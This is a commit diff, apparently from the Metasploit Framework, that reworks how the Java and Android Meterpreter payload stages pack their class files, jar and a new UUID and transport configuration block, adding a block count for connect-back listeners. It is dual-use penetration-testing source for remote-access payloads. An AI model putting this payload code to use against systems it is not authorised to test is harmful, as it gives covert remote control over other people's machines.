Java config wiring, tweak to include block counts

This commit adjusts the way that the config block is set for java and
android because behind the scenes the stageless connect-backs need to
know what to discard. as a result of connecting back to staged listeners
we need to be able to discard a number of bytes/blocks before we can
continue process (at least in the case of TCP).

Author: OJ

lib/msf/core/payload/java.rb

@@ -18,9 +18,9 @@ def generate_stage(opts={})
     stage = ''
     @stage_class_files.each do |path|
       data = MetasploitPayloads.read('java', path)
-      stage << ([data.length].pack("N") + data)
+      stage << [data.length, data].pack('NA*')
     end
-    stage << [0].pack("N")
+    stage << [0].pack('N')
 
     stage
   end

modules/payloads/stages/android/meterpreter.rb

@@ -15,20 +15,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'      => 'Android Meterpreter',
+      'Name'        => 'Android Meterpreter',
       'Description' => 'Run a meterpreter server on Android',
-      'Author'    => [
-          'mihi', # all the hard work
-          'egypt', # msf integration
-          'anwarelmakrahy' # android extension
-        ],
+      'Author'      => ['mihi', 'egypt', 'anwarelmakrahy', 'OJ Reeves'],
       'Platform'    => 'android',
-      'Arch'      => ARCH_DALVIK,
-      'License'   => MSF_LICENSE,
-      'Session'   => Msf::Sessions::Meterpreter_Java_Android))
+      'Arch'        => ARCH_DALVIK,
+      'License'     => MSF_LICENSE,
+      'Session'     => Msf::Sessions::Meterpreter_Java_Android
+    ))
 
-    register_options(
-    [
+    register_options([
       OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
     ], self.class)
   end
@@ -38,14 +34,20 @@ def initialize(info = {})
   # used as the final stage
   #
   def generate_stage(opts={})
-    # TODO: wire the UUID into the stage
     clazz = 'androidpayload.stage.Meterpreter'
     metstage = MetasploitPayloads.read("android", "metstage.jar")
     met = MetasploitPayloads.read("android", "meterpreter.jar")
 
     # Name of the class to load from the stage, the actual jar to load
     # it from, and then finally the meterpreter stage
-    java_string(clazz) + java_string(metstage) + java_string(met) + java_string(generate_config(opts))
+    blocks = [
+      java_string(clazz),
+      java_string(metstage),
+      java_string(met),
+      java_string(generate_config(opts))
+    ]
+
+    (blocks + [blocks.length]).pack('A*' * blocks.length + 'N')
   end
 
   def generate_config(opts={})

modules/payloads/stages/java/meterpreter.rb

@@ -10,28 +10,27 @@
 require 'msf/base/sessions/meterpreter_options'
 
 
-module Metasploit3
+module Metasploit4
+
   include Msf::Sessions::MeterpreterOptions
 
   # The stager should have already included this
   #include Msf::Payload::Java
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'          => 'Java Meterpreter',
-      'Description'   => 'Run a meterpreter server in Java',
-      'Author'        => [
-          'mihi', # all the hard work
-          'egypt' # msf integration
-        ],
-      'Platform'      => 'java',
-      'Arch'          => ARCH_JAVA,
-      'PayloadCompat' =>
-        {
+      'Name'           => 'Java Meterpreter',
+      'Description'    => 'Run a meterpreter server in Java',
+      'Author'         => ['mihi', 'egypt', 'OJ Reeves'],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'PayloadCompat'  => {
           'Convention' => 'javasocket javaurl',
         },
-      'License'       => MSF_LICENSE,
-      'Session'       => Msf::Sessions::Meterpreter_Java_Java))
+      'License'        => MSF_LICENSE,
+      'Session'        => Msf::Sessions::Meterpreter_Java_Java
+    ))
+
     # Order matters.  Classes can only reference classes that have already
     # been sent.  The last .class must implement Stage, i.e. have a start()
     # method.
@@ -54,12 +53,42 @@ def initialize(info = {})
   # used as the final stage; calls super to get the intermediate stager.
   #
   def generate_stage(opts={})
-    # TODO: wire the UUID into the stage
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
+    config = generate_config(opts)
+
+    # All of the dependencies to create a jar loader, followed by the length
+    # of the jar and the jar itself, then the config
+    blocks = [
+      super(opts),
+      [met.length, met].pack('NA*'),
+      [config.length, config].pack('NA*')
+    ]
+
+    # Deliberate off by 1 here. The call to super adds a null terminator
+    # so we would add 1 for the null terminate and remove one for the call
+    # to super.
+    block_count = blocks.length + @stage_class_files.length
 
-    # All of the dendencies to create a jar loader, followed by the length
-    # of the jar and the jar itself.
-    super(opts) + [met.length].pack("N") + met
+    # Pack all the magic together
+    (blocks + [block_count]).pack('A*' * blocks.length + 'N')
   end
 
+  def generate_config(opts={})
+    opts[:uuid] ||= generate_payload_uuid
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      ascii_str:  true,
+      arch:       opts[:uuid].arch,
+      expiration: datastore['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: [transport_config(opts)]
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the XML version of it
+    config.to_b
+  end
 end